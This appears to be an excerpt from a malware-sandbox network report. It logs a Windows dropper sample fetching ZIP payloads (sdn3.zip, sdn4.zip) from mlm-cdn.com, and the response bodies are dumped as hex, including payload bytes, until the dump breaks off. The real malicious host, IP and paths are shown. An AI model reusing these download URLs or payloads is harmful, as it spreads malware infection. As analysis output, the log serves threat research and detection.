                                                      2024-09-21 12:45:36 UTC8000INData Raw: 13 6b cd 81 ee 85 54 41 10 3f a5 48 04 34 0c 12 42 aa db c6 2b 26 a8 ae 6d 08 82 fe da c0 1f 61 80 a6 7c 39 e7 13 69 35 fd 18 b3 20 64 c3 55 91 41 65 8d 65 9b e7 8c e1 e7 e8 3f 28 0b e2 e7 c2 a2 dd 2c ad 7e bc de 4a 17 68 c0 bb 98 9a e2 a7 4a e3 a8 db a0 31 18 54 c3 40 a2 0e 8d 6e c2 4d da 1b 07 41 ed 50 bc aa 8c b9 c8 f5 96 9a 06 9e 9a 0f 4e c1 5b 38 a9 06 02 3e 7a 2b 04 2b 37 c7 49 5e a0 e6 25 4f b4 28 05 8f c9 48 9b 1b ec 6b 58 fe c1 93 65 94 9e f5 30 f5 df 2b 3e 00 13 08 fc 44 bf 73 66 4d 6e a3 45 ed ed 87 50 fd fe 0e 2a 8d 4a c1 2d 33 9c 6b 3f c1 62 2a 81 4a cb 4a d6 ce 82 1e 4d 97 b4 56 9e d2 24 35 10 b9 18 1e 7d 64 cc 1f f2 03 07 f0 d5 34 59 b9 ca 26 bf 54 65 f9 ac 6a 2d 2a 5d e8 93 a2 b0 9b 1a ec f9 f8 4e 8e ba 51 aa 6e 30 d8 53 e0 96 d6 b1 9a 93
                                                      Data Ascii: kTA?H4B+&ma|9i5 dUAee?(,~JhJ1T@nMAPN[8>z++7I^%O(HkXe0+>DsfMnEP*J-3k?b*JJMV$5}d4Y&Tej-*]NQn0S
                                                      2024-09-21 12:45:36 UTC8000INData Raw: 21 85 d1 4c c6 06 5c c6 c1 10 c6 65 77 df 40 b2 6f 44 d9 e3 75 a8 c5 68 e5 b9 81 15 25 8e 1b 5a 4a f8 bc 37 47 2b 5b 23 d8 d3 f5 4d f2 60 c5 fa 7f 6f b4 aa e6 be 21 71 84 e1 cc 25 e3 a1 8b 5e c4 ac 5d ff 77 42 fc dc 41 93 10 97 f2 5a bd c1 48 07 09 37 6a 54 dd 36 0a 54 9d 51 5f 7e f9 59 83 21 37 59 f8 8c 3c 5c 1e a3 35 c7 f7 05 83 f8 a6 dd ce 30 8d 5f 0d b0 fb 6b b5 19 33 07 1f 71 42 0f aa 1b 59 ec c5 bf 60 0b 52 99 42 11 8f 9a 12 02 58 be d8 47 b0 82 fd 56 32 f9 3b 9e 6f e8 8e c8 1e ab ec bd 63 6d 55 b6 5e dd d4 ed 58 2d 0c 76 4f 1e 5f 73 ae 2c 25 c3 45 1d e3 5b 68 52 0e 51 77 33 aa 6a 88 76 b7 01 a8 d6 7f 21 55 ae 3f 89 77 86 44 bb cd 95 cc 89 5f 8d 47 62 73 f1 89 8a 82 cd 64 cb 87 33 af b7 77 a8 ed 1c b1 f4 bc 77 ac 40 b4 ec e8 38 e8 76 61 51 69 96 44
                                                      Data Ascii: !L\ew@oDuh%ZJ7G+[#M`o!q%^]wBAZH7jT6TQ_~Y!7Y<\50_k3qBY`RBXGV2;ocmU^X-vO_s,%E[hRQw3jv!U?wD_Gbsd3ww@8vaQiD
                                                      2024-09-21 12:45:36 UTC8000INData Raw: b7 d2 7e f8 78 a1 9a 0b 8c ca 59 9b fb 44 92 fb 90 d0 ba 6b 2f be 83 a4 43 8e dd 8f 87 56 7c e8 b6 b3 cf b3 17 c7 fa 44 3c e0 1d aa 71 3a 19 d1 59 d2 15 01 da f0 3b f0 ed 7e be 97 a8 b2 5b 65 e7 fb c3 2f 5f 7e 7f 68 62 bf 50 da b7 f2 aa a4 0d 46 8b 38 1c 03 9f 0f 5c 6c 2e 11 a1 bf 3d fa cd 24 3c b0 24 6d 31 40 cc b7 92 08 24 e6 e6 7c 70 52 92 e1 18 d4 9d ef 27 91 49 bc 8b 3c 8b dc 17 4a 8d 2d 9d 90 95 de ba a5 87 98 98 d3 c4 9b 81 01 c8 99 83 01 50 e2 6e 2e 70 36 87 8e 61 c1 e1 f0 fb 4b fa 4a 7a 9b fc 12 ce c2 4e c6 0c 33 12 b2 33 5b e7 f8 46 a7 e2 21 3f 84 0e 1b b2 a1 a4 50 6f 91 b3 64 7c d0 a2 86 4e de c9 03 7c 27 0c 9c 76 f6 e2 b5 8f 23 75 b3 ad db 15 7c 24 5f 7c a9 bc 61 b4 2e b2 43 c2 8f 7b a2 af cb 9c 0f 5d 28 19 db 8d f7 f1 e8 e1 2b 7f bb 25 57 f4
                                                      Data Ascii: ~xYDk/CV|D<q:Y;~[e/_~hbPF8\l.=$<$m1@$|pR'I<J-Pn.p6aKJzN33[F!?Pod|N|'v#u|$_|a.C{](+%W
                                                      2024-09-21 12:45:36 UTC8000INData Raw: a5 b5 62 c1 c3 2b ab fb 17 7e b4 aa 68 f5 7d df 13 f9 9a cf af ad ce e8 7d 7c d7 7e df 19 8e d3 54 e1 71 57 ae 3a 6c 54 4c 99 9f 6d 1e f7 da a5 d7 b7 d3 5f 8e 5e b0 70 cd 9e 09 9b 36 2f 2d a0 1a 93 f3 06 ae d6 8e dd b5 dd b7 e0 c2 b5 5b 3e 3c a7 18 7f a7 9d b7 af 4e b9 9d 76 64 e2 90 45 ed 3a 1f f9 7a 62 fa 8e 8d 7b ae 0f 09 2f bf 10 bf ae 8d 7b a0 85 d3 9d e1 4b 96 3d 3e 7c 66 c8 82 a9 3f 76 5c 77 fe f1 96 df 96 5d 9f e4 14 f6 3a fb c9 85 b5 83 c7 45 29 f5 fd fa 4c 39 30 f4 e8 d9 1d 3b 5e c8 42 7f fc be f2 03 cb 1e 97 be f8 6a cd a8 c1 ea 82 c6 b6 87 57 ee d8 9f 3a eb c3 d3 ef f5 b7 d4 cc 70 ee db e7 db 9f be 0f 59 54 71 e6 51 c5 ab ab 19 e7 03 73 32 02 d2 cc 13 c3 bb 7f 9b ef bf 34 6b 9d 50 39 b0 7a c2 bd c3 cc f9 fb 83 2c 23 32 d7 f4 da 7b ec a3 63 a2
                                                      Data Ascii: b+~h}}|~TqW:lTLm_^p6/-[><NvdE:zb{/{K=>|f?v\w]:E)L90;^BjW:pYTqQs24kP9z,#2{c
                                                      2024-09-21 12:45:36 UTC8000INData Raw: 3f d3 55 79 14 5d 9c 76 a6 99 bb cd a3 1a 09 6d ba 0a 41 bc ed f4 cc 89 fa c0 41 5d 25 9a ec f6 d4 8b 42 8c 04 0f d8 d7 ad b6 97 59 16 2b 1e f8 a2 dc 19 65 74 a1 67 85 a7 00 f6 e0 1b e7 1e ba 09 e6 61 3b 91 83 7d a6 bd 25 dd 75 0b 7a 92 76 02 31 4e 3f 44 f7 50 bc eb f4 aa d4 d8 b7 96 c7 13 47 c6 89 50 0e 55 b0 2a 3e 7e 24 91 3e dd 54 43 05 d4 e1 d5 0e eb b0 b7 0a d6 c0 6a 1c af c2 eb 7d d8 a7 f2 1b ed 3f 6e 2a 77 e9 29 78 ad bf 3f d6 7e 43 c5 d1 e2 2f 61 9c 56 ef 25 90 44 05 88 e0 05 37 78 a0 09 d1 dc d0 02 02 22 7b 60 2b e6 16 80 57 18 8f 19 ac 58 f3 59 bb 92 a5 b4 32 98 8e f4 22 e4 69 85 76 a8 47 fe 5d a8 4d 3d 8e 04 86 5d 8e 48 8d 88 db 06 3e ac 5b 71 0d 13 e3 f6 42 3b bb d6 23 c5 8d 3d 7a 5c 28 c5 47 10 4d 7c ed 62 ac 3e 26 eb 86 f6 51 5c 80 33 6e a4
                                                      Data Ascii: ?Uy]vmAA]%BY+etga;}%uzv1N?DPGPU*>~$>TCj}?n*w)x?~C/aV%D7x"{`+WXY2"ivG]M=]H>[qB;#=z\(GM|b>&Q\3n
                                                      2024-09-21 12:45:36 UTC8000INData Raw: 45 f3 5f bf 77 2f fc 95 15 80 85 c5 bc d8 e4 2c 36 2f 1d 84 62 92 4f c5 45 bb 38 31 30 b4 4a 2d d4 e3 91 1e 9c 6b 2a f4 d1 9b 5f 60 4c b1 13 6b 46 f8 45 37 2b 0a e0 76 2b b5 1d 9f 33 30 50 aa 4e c1 6f 51 8e 40 82 1c 81 5f f2 b6 4e f8 be ad 83 7d a7 5f 3f 6f 10 1c 6f 33 5d fb d9 dd 64 37 d6 57 4e b3 d4 0a bb af e7 25 78 99 d0 ba 3d eb 8a b8 95 0d 68 c7 ec e0 dc 70 87 29 94 b5 bc a8 7f cd 24 43 7e bf d4 89 ce 67 f9 89 b4 89 7e 92 c9 44 e3 01 fd 5c 67 03 c0 a6 36 1f 0c 36 12 86 c4 20 01 82 c4 8c 07 ca ee db 99 32 2e 3d d0 47 4a 2d 8e 28 f0 d1 85 a4 8d 5c 72 8c c9 eb 5e ac 0e 58 0c 89 cb 9e 56 7b 2f 39 04 45 52 aa fd 7a 07 af b6 e7 fa 7c 64 2c aa 39 a7 43 03 59 d3 54 f9 b9 5b 2d e2 88 7e 57 42 6c 69 84 30 9e 3d 11 3f ac 52 b0 60 47 4a c3 f5 eb f7 a1 f4 f5 3b
                                                      Data Ascii: E_w/,6/bOE810J-k*_`LkFE7+v+30PNoQ@_N}_?oo3]d7WN%x=hp)$C~g~D\g66 2.=GJ-(\r^XV{/9ERz|d,9CYT[-~WBli0=?R`GJ;


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.749702142.11.212.1844434504C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-21 12:45:37 UTC49OUTGET /ssd/sdn3.zip HTTP/1.1
                                                      Host: mlm-cdn.com
                                                      2024-09-21 12:45:37 UTC262INHTTP/1.1 200 OK
                                                      Date: Sat, 21 Sep 2024 12:45:37 GMT
                                                      Server: Apache
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Last-Modified: Sat, 10 Aug 2024 18:46:13 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 81710
                                                      Vary: Accept-Encoding
                                                      Content-Type: application/zip
                                                      2024-09-21 12:45:37 UTC7930INData Raw: 50 4b 03 04 14 00 00 00 08 00 7b 13 15 53 df 56 8d 8c fe 2c 00 00 98 50 00 00 0a 00 00 00 57 65 72 45 6e 63 2e 64 6c 6c ed 7c 07 5c 53 49 b7 f8 a4 00 01 29 51 01 51 01 23 82 62 01 6f 08 90 20 bd 44 ba 04 03 44 04 a4 06 42 c7 14 29 8a 0a 88 1a 22 8a 6b af 8b 82 65 77 ad eb ba a2 a2 82 a2 88 82 62 ef 8a 3d 28 2a 2a 2a 2a 9a 37 73 13 10 cb 7e fb 2f ef fb bf ef bd ff 37 fc e6 ce cc 39 67 ce 9c 39 e7 cc 99 99 9b ab 81 93 cb 00 09 00 40 86 59 a1 00 a0 0a 28 93 1b f8 fb d4 0e b3 ee 90 03 ba e0 0f cd a6 a1 55 84 80 a6 a1 21 82 64 11 2d 4b 98 99 24 8c 4d a7 c5 c7 66 64 64 8a 69 71 7c 9a 50 92 41 4b ce a0 79 05 71 69 e9 99 09 7c 6b 1d 1d 2d 73 15 0f 67 bf f8 43 b9 a3 75 9e 77 e7 2c ee fa e7 d9 b0 4c 77 d3 7d 91 83 97 9a 2f 92 71 9c f6 f3 68 bc ad fd 22 0f 2f 29 aa
                                                      Data Ascii: PK{SV,PWerEnc.dll|\SI)QQ#bo DDB)"kewb=(****7s~/79g9@Y(U!d-K$Mfddiq|PAKyqi|k-sgCuw,Lw}/qh"/)
                                                      2024-09-21 12:45:37 UTC8000INData Raw: 02 30 bf 5e f1 ce e5 1f c5 bb 2f c1 ee 2f 78 8b bf 0b 6d 50 81 fa 5d 33 a6 06 6f ca 3d 9a f1 fb 0b 07 97 6a a7 89 7a 19 a3 5d a9 fd 45 9f b7 0a 9a 7d 36 db 06 96 2c 57 1b fe 9c 3e be 2c 36 f7 b2 82 65 cd 4e ed a8 79 68 59 75 dd 64 51 c9 0d cd 2b 83 ea 03 b4 ec 13 53 16 b4 0d be 42 2e db 6a 34 a0 72 cd fe 7b 6e 36 f6 d3 ea 6a 27 9f 38 f2 80 5c f3 c4 f0 c2 b6 63 82 17 71 db 6e 85 a4 71 b0 49 9b 9f ce f8 bc 74 cb 84 85 1d 6d 33 e6 8a 78 47 27 0e 15 d9 4e 7e 5d 51 12 76 92 7c 5d 43 f3 59 a7 ec fe 99 8e 99 0b 77 b4 bf ed 53 42 f9 e8 da 60 22 9c c5 ad 7a 7a 38 be e5 be 33 9d bf ab e0 e1 ab 6d 4d 86 95 3f 3b 6f dd bd e6 a8 47 73 d9 9c e8 10 13 85 f4 c9 01 13 ef b2 cc 5d a2 09 ee 3f bb fd 1c fd 70 c3 a8 df fb 2e 16 95 0c b5 6c 3f 73 5b e4 10 ed f2 5b 64 4c db 1d
                                                      Data Ascii: 0^//xmP]3o=jz]E}6,W>,6eNyhYudQ+SB.j4r{n6j'8\cqnqItm3xG'N~]Qv|]CYwSB`"zz83mM?;oGs]?p.l?s[[dL
                                                      2024-09-21 12:45:37 UTC8000INData Raw: d9 a5 51 d1 c8 a6 c4 26 bc 7b 62 4f 0f 80 72 9f b2 b9 56 ab d0 d3 ce 21 4a a9 e4 fa 34 13 56 93 be e3 17 d0 1f 2d 27 7d c7 3f 42 e9 10 70 46 2e 3d 41 d5 70 1c 8c d4 55 09 14 50 7b 6c 54 0d bf 98 8c 27 46 66 13 92 49 47 32 55 18 a3 6d 85 c3 4c 25 67 cd e2 ea 15 b5 76 8e 50 c1 af 8b a7 94 1e 1a c1 d7 26 12 6a b7 c4 a8 65 22 35 dc 09 2f 5d c7 ad ff dd 80 55 a4 25 92 ca 4c 24 b5 27 81 d4 9b 24 4a ea 04 2a e1 dd 19 97 7e 89 db 45 9a bd 3d cd 55 28 d8 e1 83 bc ca 83 92 ab 16 99 9c 5e c3 e9 e0 c4 1d c8 8d f3 ef 74 ce 56 89 c3 b9 9f 3a 9c ee 43 73 f0 b5 5b 0b b5 ac 38 dc b9 12 5c 1b c5 bd eb d0 0d 88 5b 00 53 e0 03 d9 ed 49 38 07 2d d7 6d 49 e8 78 eb 64 af 76 08 df 9b 36 8a ea 73 50 01 cb 53 3d 0e 9e fa a6 49 9e 5a 50 28 e9 bb c9 61 21 a2 3e 92 2d 3a c0 8b 63 c1
                                                      Data Ascii: Q&{bOrV!J4V-'}?BpF.=ApUP{lT'FfIG2UmL%gvP&je"5/]U%L$'$J*~E=U(^tV:Cs[8\[SI8-mIxdv6sPS=IZP(a!>-:c
                                                      2024-09-21 12:45:37 UTC8000INData Raw: f6 43 c9 39 1f 77 c9 18 b8 04 3c a1 08 11 d8 69 54 1b f9 ec 91 98 97 06 12 cd c5 ec 55 3e 10 3f 1f a4 c7 d6 80 fb d0 dd e0 79 64 2a 17 d1 cf 8f 0c d5 3e f8 35 6f c0 d8 c3 04 6e c4 cf fa 59 7a 12 50 2c 7a fc 98 56 2c 1b f1 e8 c0 30 f7 0f 5b 21 37 f5 64 94 c0 3e 92 96 8e 6f 8b 19 df f3 8c f8 5e 62 c0 77 91 1e de 3b 9e b1 e4 d3 2a cd 4a ab 79 84 56 29 63 c5 58 65 45 68 75 df 28 54 2f 7c 2f 25 bb 04 ed 47 7a 32 69 ad ef e1 a0 f6 db 0d 3d b9 d8 17 cf 41 1a 0a a6 b8 69 86 d6 90 c3 38 d8 63 85 5e 30 05 7f d1 41 4d 83 29 99 6a fe 0e a6 64 43 0b d3 67 93 7e e3 13 01 12 ec ca 85 be 96 f6 37 f6 9d 27 12 f5 83 ef 00 42 01 f2 8b f3 52 9a 21 11 f0 44 20 8a 52 9a 12 89 92 18 d4 be 1b 7f 2b 95 4f 80 fd d1 7f db d0 e9 ea 27 87 57 86 dc 8d ab c9 2b 6b f8 5b e1 65 12 07 f0
                                                      Data Ascii: C9w<iTU>?yd*>5onYzP,zV,0[!7d>o^bw;*JyV)cXeEhu(T/|/%Gz2i=Ai8c^0AM)jdCg~7'BR!D R+O'W+k[e
                                                      2024-09-21 12:45:37 UTC8000INData Raw: a7 63 b5 75 59 8d 5c a3 aa 61 e6 99 c0 00 98 c8 8b 4f c5 22 cd c2 d5 1c 19 5f 5d c7 51 7d ca 08 db e3 7e b1 ca 42 9c 5f e9 0e e2 91 a9 b4 62 dd 4c 0f 08 a8 aa 64 f6 da 52 a0 af 8f c2 ba 9a 00 d5 c4 58 82 7b 93 33 66 e7 61 8d 31 67 59 30 ab a1 24 55 bf 33 ee ed d0 3d 53 c8 1c b4 21 96 76 89 14 73 8f 47 ca a5 6a a1 33 13 41 9a ca 73 a8 81 04 42 78 d5 49 b1 4e 5a ac 1a 2f f1 42 ff 79 99 3a 4b 34 35 73 eb 25 5e 9b 6f 41 99 cd 98 2f 61 44 90 cc b5 52 09 98 b6 10 9f 11 41 26 cc 0a 5b 8a 32 d4 3b ae 98 56 2e c0 55 2a 1d 46 6b a9 f6 4a 85 51 59 a7 34 63 cc 20 6a 61 55 a2 ba ce 44 35 96 39 ce 47 7d 00 8a 9f c8 61 ca cd d9 c6 97 3e 17 64 f1 01 47 b8 ce 85 a4 71 c9 83 2c 75 6d 90 9f 75 a5 d9 f9 ca 76 11 e1 cc 6b 3e c6 d5 b5 91 e3 42 ab b9 7a 38 57 57 65 1b ce 2c 80
                                                      Data Ascii: cuY\aO"_]Q}~B_bLdRX{3fa1gY0$U3=S!vsGj3AsBxINZ/By:K45s%^oA/aDRA&[2;V.U*FkJQY4c jaUD59G}a>dGq,umuvk>Bz8WWe,
                                                      2024-09-21 12:45:37 UTC8000INData Raw: eb 6f a5 d5 d4 03 a2 71 71 b4 63 9c 46 a4 2e 30 51 e7 9b 0c 55 3d a2 9f 30 72 d0 68 2b f7 02 83 64 04 9b 76 e2 fa 4a 0b a6 3f 43 f4 f3 74 94 20 5b 04 95 ae f5 ef 7c 10 07 b6 0c 1e cf 77 88 ea 05 8c d2 cc 62 c0 0b 58 35 61 bc 2a 53 4d 3a 4f 2f 3a 59 89 39 1b 25 66 d5 56 89 0b b6 b3 20 7b 14 4e 1d 4b 74 0d 0b 30 da 12 d2 1f 6d e2 85 d8 1f 0f 5d 85 d0 90 72 1d a3 b9 c9 2a ff d7 99 50 5c 24 9c 18 4f 03 d7 7e 82 8b 92 32 9e d4 9f 2b c8 8a c0 a6 10 82 ec 61 36 5d c2 ee 59 96 7d 4d 90 85 df 54 38 98 83 f3 ed 19 f1 f4 ab 27 df aa bb 53 61 e4 68 e3 6b 76 d0 28 c7 55 31 6c 20 5a 75 9d 1c 59 d1 77 d6 56 74 60 bc 17 db 5d e5 cc 9c b3 38 5b 8b 8a 0f a3 bd d6 91 6b 27 cf 02 53 4d 04 d9 f7 21 d9 33 33 ec 42 1c 41 f6 0d 5c 84 b7 64 66 3c 34 48 02 7f ee a6 43 78 c3 d2 9f
                                                      Data Ascii: oqqcF.0QU=0rh+dvJ?Ct [|wbX5a*SM:O/:Y9%fV {NKt0m]r*P\$O~2+a6]Y}MT8'Sahkv(U1l ZuYwVt`]8[k'SM!33BA\df<4HCx
                                                      2024-09-21 12:45:37 UTC8000INData Raw: 53 1f b1 8a 0f 94 ef ad 78 1f c4 97 9a 14 1d a3 98 a6 48 c6 e2 21 0f 8c 8f 14 c6 24 a5 a4 ab d2 14 bd a8 f7 85 1b 85 4e 4a 99 96 9c 20 84 a6 4b 4a 4f 98 82 ed 6e c0 80 7c 91 ac 98 31 3e b2 a1 6d a7 c7 29 a3 27 27 29 9a 90 d1 80 a8 69 1c 70 8f 1c 35 0a ef 1c 4d 92 05 51 93 54 b1 4a 61 9a 42 a9 4a 4b 4e 48 86 4c 26 bd 53 3b 0d 68 de 57 df ef 2d b4 51 bc 58 c5 bf 6a 8b 0f f2 4f 42 9a 52 05 54 c7 26 a4 37 56 d1 b4 e8 d4 f7 f0 e1 7b db fb 5f b5 df bf 6a b7 74 a8 b2 e8 34 b6 ca a1 66 8c 10 e9 f9 52 11 17 ad 4a 52 7e a0 aa 1a f0 7f 30 3d 4b 7c 13 df 49 60 27 8d f0 4e 9f d5 77 56 f4 57 42 ff 4e 89 d3 e3 40 de c0 b2 4e d6 b7 2c fa c5 35 d8 a3 bc 28 6a 0e 40 4f 00 4f 4f 2f ca db db 8b ea 01 f6 81 00 fd 01 1c 00 fa 62 9c 39 10 a7 27 98 98 06 cf 63 a0 5c ef 43 51 fd
                                                      Data Ascii: SxH!$NJ KJOn|1>m)'')ip5MQTJaBJKNHL&S;hW-QXjOBRT&7V{_jt4fRJR~0=K|I`'NwVWBN@N,5(j@OOO/b9'c\CQ
                                                      2024-09-21 12:45:37 UTC8000INData Raw: 53 07 bb b4 9e 61 26 1e 11 33 20 af ff ed a3 8a ad dc a9 b6 65 9f bc 3c c3 7b 3c 4d f3 a5 d5 ae 1f ae 79 f7 ab d8 6e bb b3 c8 82 a3 9a 72 73 5a 65 4c 4c 67 d7 f9 09 9a 23 db 65 de c9 e3 26 2e db 30 fe f4 7a d1 42 11 63 ba c7 b7 c8 52 e0 fe eb 94 6d 61 39 2f f3 44 8a 97 29 c5 f7 3a ed 52 2b 13 bc 77 1c 8f 97 ee ba 3b 45 bc 76 3f af 3c c3 2c c8 f7 c1 b3 05 b1 81 db 9e a6 ef 34 5f fd 38 49 f1 cd d1 d1 e3 ed d6 45 74 28 9e 19 38 27 75 fb aa 8e 0b da ed 58 54 b9 ff 64 cb 4c 3b df 4b 6d db f5 a9 9f b0 ce d6 e1 be ec e9 c3 c3 17 a7 8c e8 1d 65 f6 60 79 f0 a7 f7 8a 6a 4b eb 5f fe ea ed 14 d8 5a e8 ba 98 7b ff c0 76 8b c0 75 96 2b 3d 9a c5 7d 39 66 42 9f 4d 07 f9 5b 44 ee 9e a5 81 ae 2e 73 d6 fd fc a0 f0 e2 8b e6 d3 5f ce 33 eb e8 7b ea 33 97 ca 8b 9f 9e dd 37 9f
                                                      Data Ascii: Sa&3 e<{<MynrsZeLLg#e&.0zBcRma9/D):R+w;Ev?<,4_8IEt(8'uXTdL;Kme`yjK_Z{vu+=}9fBM[D.s_3{37
                                                      2024-09-21 12:45:37 UTC8000INData Raw: 31 9e ff d7 ee 49 ce 03 22 a7 06 0c 7d b6 61 41 eb 0c d1 82 d6 73 1a f8 ca d4 94 e3 b8 a0 75 12 f8 c5 37 59 b6 6d 3d 16 bc 46 83 98 6f ba 6c 6b 62 86 b3 59 4b f3 16 06 46 b4 e2 70 73 33 5f 73 33 5f 8a 32 9f 03 73 eb f1 ee 76 44 46 7f 77 d1 36 6c 4e 57 df bb 1b b3 3e 3f a9 cd 99 3f 30 e4 6a d4 91 17 5f f5 2d 8f 7b d4 eb e6 ae d8 cc 7d 41 33 af 9a b4 a1 76 eb 46 cd 58 d8 7d 74 6b 0f 9e 97 e8 8e 43 cb 1c 97 9b 53 ac 6c 05 4e 22 a3 dd 0c d7 71 b9 99 8b 37 67 2e fa 6f 72 22 26 77 81 e5 ab 8f 47 8d 3e 1e 35 fa 78 d4 e8 e3 51 a3 8f 47 8d 3e 1e 35 fa 1f 7e d4 e8 e3 2d 93 8f b7 4c 3e de 32 f9 78 cb e4 e3 2d 93 8f b7 4c fe 27 dc 32 71 5c c0 ed 0f e3 5d 9f ff bf 1c 21 5c c0 99 2a ea 60 bc 04 d5 74 36 ff 77 c7 08 5d df 3d 46 b8 fc e0 ab 5d 07 1d 1f 3b 8c 69 7f 66 67
                                                      Data Ascii: 1I"}aAsu7Ym=FolkbYKFps3_s3_2svDFw6lNW>??0j_-{}A3vFX}tkCSlN"q7g.or"&wG>5xQG>5~-L>2x-L'2q\]!\*`t6w]=F];ifg
                                                      2024-09-21 12:45:37 UTC8000INData Raw: 13 ce 6c 44 fb b7 92 e3 75 dd 7e b8 fc c0 b4 be 9b 8e bc 36 bd e6 fe a2 09 9b 5f ec 17 2c 7e b9 ac b0 ef 45 ba d0 cd 48 17 f2 d2 ca b8 1c 8a c3 11 8e 68 7a 7f fb e4 b1 a5 8e b0 75 07 17 16 1f 2f ed 46 7b b6 78 45 09 c0 fe 5b c4 1d ee 58 1e df 87 33 7c 98 b8 17 dd 03 23 ee 82 2e c3 4d 8c ca c2 98 44 23 55 06 75 0e de 29 26 b1 90 f6 c2 9d 1d 04 1d 94 2a 5d 96 d1 a4 11 f7 a4 fd 30 c5 43 d0 39 ce a8 37 6a 8c a2 b8 58 51 92 56 af 85 7d 25 f6 a7 fb e2 3e ae c0 2f 36 36 56 14 c7 98 2c da 2c ad 1a 74 8a 94 8c 29 4f 0b 3b 96 7e a1 bb a7 44 4c 87 4a 42 69 52 c6 03 1a 2e 96 48 e1 5f e8 90 d0 21 e3 e9 d4 b6 ce f9 d1 dd 88 35 1f 6f 25 a3 b6 68 b3 8d 2d b6 06 d3 41 c4 96 4f 60 73 8f c2 9a a9 d3 aa 45 71 46 0d d8 d3 66 1b b4 86 6c 51 8a d1 68 11 a5 c8 c2 e8 42 4e 40 eb
                                                      Data Ascii: lDu~6_,~EHhzu/F{xE[X3|#.MD#Uu)&*]0C97jXQV}%>/66V,,t)O;~DLJBiR.H_!5o%h-AO`sEqFflQhBN@


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.749703142.11.212.1844434504C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-21 12:45:38 UTC49OUTGET /ssd/sdn4.zip HTTP/1.1
                                                      Host: mlm-cdn.com
                                                      2024-09-21 12:45:38 UTC263INHTTP/1.1 200 OK
                                                      Date: Sat, 21 Sep 2024 12:45:38 GMT
                                                      Server: Apache
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Last-Modified: Sat, 10 Aug 2024 18:46:12 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 464977
                                                      Vary: Accept-Encoding
                                                      Content-Type: application/zip
                                                      2024-09-21 12:45:38 UTC7929INData Raw: 50 4b 03 04 14 00 00 00 08 00 f0 90 e6 36 f7 a8 ed 91 d4 00 00 00 48 01 00 00 0c 00 00 00 6e 73 6b 62 66 6c 74 72 2e 69 6e 66 55 8f c1 6a c3 30 0c 86 ef 06 bf 83 08 3d 2e 81 1d 76 2a 39 ad e4 d2 12 0a 09 cd 61 8c e1 d4 72 2b ea d8 20 bb 0d 7d fb b9 69 1a a8 d0 41 48 fa ff 4f 5a 83 0b 97 de d8 c8 05 39 23 c5 3a 25 d4 0d 6c f1 de 7b c5 1a 2a b2 11 f9 d1 9d 87 ed 99 02 a4 5d 30 64 31 15 21 2a 6b 03 c4 33 42 b7 a9 a0 62 35 e0 e8 f9 02 3d 39 c5 84 41 0a 29 7e 0e c8 81 bc fb 95 a2 a1 93 53 f1 ca 58 66 ab 8e 9c f6 63 80 ba 5d 65 52 ec d9 df 48 23 97 75 b3 7b 88 9e c0 3c cf 97 1b e1 db cf 40 e4 17 5a c5 e4 0b f9 14 93 62 e2 2d 5f d5 6d d1 69 93 b8 db 41 9b 06 f9 46 47 84 72 71 fc 58 aa bf 51 9b 80 c7 f8 26 7f 35 67 fd 8e 7a 56 7c 9f 9f 49 36 9f c5 d7 13 f8 0f 50
                                                      Data Ascii: PK6Hnskbfltr.infUj0=.v*9ar+ }iAHOZ9#:%l{*]0d1!*k3Bb5=9A)~SXfc]eRH#u{<@Zb-_miAFGrqXQ&5gzV|I6P
                                                      2024-09-21 12:45:38 UTC8000INData Raw: ad 84 0a eb 55 f7 1b f5 fa 2a 13 2f 39 bc 33 41 c2 8a 61 63 c9 bb 2c 68 2a 3a f0 34 a7 62 e5 55 26 cf 0d 37 2a d0 e1 a3 5a 75 03 74 29 9e 80 b2 b7 1b e1 fd de 05 d0 73 b8 ca e1 ad 11 dd 6d c8 1d 78 0f 64 31 5c cb ca 22 e1 82 b7 1c 05 9a 10 00 53 d0 00 4c 19 84 91 42 dc 2d b7 27 57 82 d7 e9 0a 29 1d 9e f7 ae 87 cd 15 29 36 d2 22 a8 4a 93 c9 df 1a c4 23 65 03 d4 50 68 73 27 a0 92 d6 26 a4 d0 74 d3 61 37 28 0e 02 1a c1 35 1b 8c 5a 74 5f 2b ba 2f d6 8a 1e 89 21 f3 79 5b 11 22 31 8a 28 e0 e2 24 ba ad 57 3c 02 6b 12 ea a8 b8 0f 72 b0 5f 5b b9 de d6 0d 02 a4 54 80 91 a8 88 40 24 32 80 4d 17 02 60 ea 6f 80 b5 e3 c6 b8 e1 70 93 13 5e 26 05 84 1f 81 8f 08 4d 83 a0 32 8b a1 31 03 fa 44 d6 57 2b ab a8 82 26 d9 eb d8 18 04 95 09 a1 32 ff 15 54 cb fa 82 c6 d2 04 d1 ca
                                                      Data Ascii: U*/93Aac,h*:4bU&7*Zut)smxd1\"SLB-'W))6"J#ePhs'&ta7(5Zt_+/!y["1($W<kr_[T@$2M`op^&M21DW+&2T
                                                      2024-09-21 12:45:38 UTC8000INData Raw: ae a3 69 f5 43 df 8d 73 bf f6 43 1d 5a fc 10 f0 3b e0 05 96 3d 02 85 03 b5 23 6e d3 1a ce b6 e4 68 df f3 54 62 c2 53 05 e0 c3 70 51 91 6f 91 f7 5c 4f 23 4f a5 c8 02 7a 09 95 14 b9 aa 16 95 85 a1 a4 b1 c2 b6 e8 2b 72 5b 53 8c dc 56 0a 2e c5 3d 8d 62 54 ae 51 8c fa cf c8 bd 13 12 50 d6 10 a4 3a 18 f9 bd ce c6 7e af 0d 86 6f 1c 1f e0 47 50 bc f8 c5 30 a7 11 71 1b 6f dd 4d 19 b8 60 f5 6b 0c eb de 6d e2 0c b7 eb 9c e3 1f 7e bf 1f ff fb e7 38 ac 60 55 d7 34 a6 19 75 f4 91 b2 67 ea a9 bd 6a 19 fe cf df fa c7 78 f9 ab 3b bc 6b 97 1d b9 66 a0 b7 5b 63 cd bb da 27 f5 b6 85 dc 8a 62 65 ff d2 bb 43 1f 2d af 57 71 95 43 46 78 0d 